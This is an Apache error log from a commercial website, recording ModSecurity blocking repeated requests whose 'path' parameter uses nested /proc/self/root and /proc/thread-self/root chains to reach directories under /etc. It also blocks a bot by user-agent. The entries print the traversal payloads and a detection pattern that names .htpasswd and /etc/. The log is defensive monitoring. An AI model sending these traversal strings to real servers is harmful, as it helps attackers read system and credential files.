[Wed Mar 18 14:12:56.122470 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:33920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdGAbLMZ6AikZjR9XiyQAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:12:59.312682 2026] [mime_magic:error] [pid 14269:tid 140411683178240] (70014)End of file found: [client 57.141.18.119:53280] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:13:00.456219 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:38720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdHEzinOy1jxa1j4c8tQAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:13:54.675666 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:38720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdUkzinOy1jxa1j4c9AAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:13:57.006563 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:55160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdVSmAPhZkrhU8w4mQTgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:14:07.463492 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:55162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdX-w_le52K8_3pV0ApgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:14:22.098974 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.228.61:57924] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrdbSmAPhZkrhU8w4mQWgAAAJI"]
[Wed Mar 18 14:14:22.105852 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.244.43:44288] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrdbeoXxyEfFpUF8f-UFAAAAUw"]
[Wed Mar 18 14:14:23.375405 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:54628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdb9a6ubjKNq_cu4bCDQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:14:38.108642 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:57232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdfuoXxyEfFpUF8f-UIwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:14:57.631055 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:60914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdkSmAPhZkrhU8w4mQdwAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:15:00.275982 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:40740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdlAkwaGbbGflqUZA04QAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:15:19.739206 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:53022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdpwbLMZ6AikZjR9XjHgAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:15:24.238731 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:54904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdqwkwaGbbGflqUZA08gAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:15:43.516300 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:57460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdv9a6ubjKNq_cu4bCTwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:16:04.017898 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:47586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrd1AkwaGbbGflqUZA1DwAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:16:27.356576 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:54920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrd60zinOy1jxa1j4c9fAAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:16:54.003606 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:32784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreBuw_le52K8_3pV0BLQAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:17:26.519280 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:57854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreJvu8EFLIOrSqIpsmHAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:19:10.369267 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:60256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrejimAPhZkrhU8w4mRSgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:19:21.478765 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.244.43:59096] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abremQbLMZ6AikZjR9XjqAAAAA0"]
[Wed Mar 18 14:19:22.162319 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:46460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abremta6ubjKNq_cu4bC5AAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:19:23.819228 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.228.61:57798] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrem-w_le52K8_3pV0BhAAAAgk"]
[Wed Mar 18 14:19:35.702205 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:54106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrep-w_le52K8_3pV0BlAAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:19:38.140238 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:47872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreqsdf6f5d65gmYZT5SgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
